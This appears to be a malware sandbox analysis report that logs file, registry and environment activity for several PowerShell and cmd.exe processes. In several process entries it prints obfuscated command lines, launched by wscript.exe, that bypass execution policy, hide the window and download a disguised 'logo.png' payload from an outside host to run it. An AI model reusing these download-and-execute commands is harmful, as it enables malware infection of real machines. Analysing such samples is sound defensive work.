Get Time type = Ticks, time = 124629 True 2
Fn
Get Time type = Ticks, time = 124644 True 4
Fn
Get Time type = Ticks, time = 124691 True 5
Fn
Get Time type = Ticks, time = 124707 True 3
Fn
Get Time type = Ticks, time = 124722 True 4
Fn
Get Time type = Ticks, time = 124738 True 1
Fn
Get Time type = Ticks, time = 124753 True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:45:57 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 17871817518 True 1
Fn
Get Time type = Ticks, time = 124769 True 3
Fn
Get Time type = Ticks, time = 124785 True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory, result_out = ,õ$ True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #7: powershell.exe
278 0
»
Information Value
ID #7
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:51, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:34
OS Process Information
»
Information Value
PID 0x8b8
Parent PID 0x848 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8B4
0x 8D8
0x 8DC
0x 824
0x 9F4
0x 578
0x AD4
Host Behavior
File (57)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 8
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (70)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (67)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 61
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #8: powershell.exe
333 0
»
Information Value
ID #8
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:51, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:34
OS Process Information
»
Information Value
PID 0x31c
Parent PID 0x83c (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8E8
0x 8E4
0x 8D0
0x 904
0x 948
0x 78C
0x 478
Host Behavior
File (109)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 46
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (77)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (5)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment (68)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 62
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #10: cmd.exe
62 0
»
Information Value
ID #10
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:54, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:31
OS Process Information
»
Information Value
PID 0x838
Parent PID 0x41c (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 840
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
